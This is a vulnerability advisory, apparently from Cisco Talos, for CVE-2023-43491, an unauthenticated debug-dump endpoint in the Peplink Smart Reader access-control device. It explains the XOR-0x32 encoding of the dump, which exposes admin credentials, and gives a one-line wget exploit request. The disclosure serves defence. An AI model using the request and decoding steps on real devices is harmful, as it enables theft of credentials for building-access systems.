CVE-2023-43491
An information disclosure vulnerability exists in the web interface /cgi-bin/debug_dump.cgi functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Peplink Smart Reader v1.2.0 (in QEMU)
Smart Reader - https://www.peplinkworks.com/Smart-Reader.asp
5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CWE-284 - Improper Access Control
The Peplink Smart Reader is the access-control hardware associated with the PepXIM Time-Logging and Security System. It is used to manage access to buildings, workstations and public transit, as well as for employee time management.
The Peplink Smart Reader exposes a web server on port 443 intended for local configuration and control of the card reader. This web server exposes an unauthenticated endpoint at /cgi-bin/debug_dump.cgi. This appears to be used when Peplink support needs more significant diagnostic information to troubleshoot an issue and the device is in a situation where the ‘REMOTE_ASSISTANCE’ functionality is not feasible. This endpoint is handled by a standalone shell script located at /web/cgi-bin/debug_dump.cgi, which does not implement any form of authentication.
The shell script initially runs a series of commands (output collected in /tmp/debug.dump), then executes a final tar command that creates an archive of the diagnostic output in /tmp/debug.dump, as well as specific files and directories as listed in the below command.
(tar cf - /etc/software-release \
/etc/build \
/etc/build_timestamp \
/etc/wifi*[._]* \
/etc/ap*[._]* \
/etc/wapi*[._]* \
/etc/portal_* \
/etc/model \
/etc/*product* \
/etc/hardware* \
/etc/hw_ver \
/etc/variant \
/etc/masterconfig* \
/etc/last_reboot_reason \
/etc/resolv.conf \
/etc/icclient.cfg \
/etc/net/* \
/etc/mac/* \
/etc/ppp/* \
/etc/cwmp/* \
/etc/hostapd* \
/etc/nfc.conf \
/var/log/submit_cloud.log* \
/var/log/message* \
/var/log/vpn_daemon.log* \
/var/log/vpn/* \
/var/log/nfc-*.log \
/var/run/* \
/var/spool/* \
/tmp/debug.dump/* \
|gzip - -c 2> /dev/null | xor)
Lastly, the archive is gzip compressed and piped through a binary named xor, which is responsible for enciphering the archive. This application implements a byte-by-byte XOR encoding, where every byte of the archive is XOR’d with the value 0x32.
An unauthenticated attacker who submits an HTTP request to the /cgi-bin/debug_dump.cgi endpoint can decode, decompress and unarchive the file, granting them access to significant information about the device, including sensitive information such as the administrative user’s username and MD5 password hash.
wget --no-check-certificate https://${TARGET}/cgi-bin/debug_dump.cgi
The vendor links to new firmware versions at the end of their advisory: https://forum.peplink.com/t/peplink-security-advisory-smart-reader-firmware-1-2-0-cve-2023-43491-cve-2023-45209-cve-2023-39367-cve-2023-45744-cve-2023-40146/47256
2023-11-30 - Vendor Disclosure
2024-04-17 - Vendor Patch Release
2024-04-17 - Public Release
Discovered by Matt Wiseman of Cisco Talos.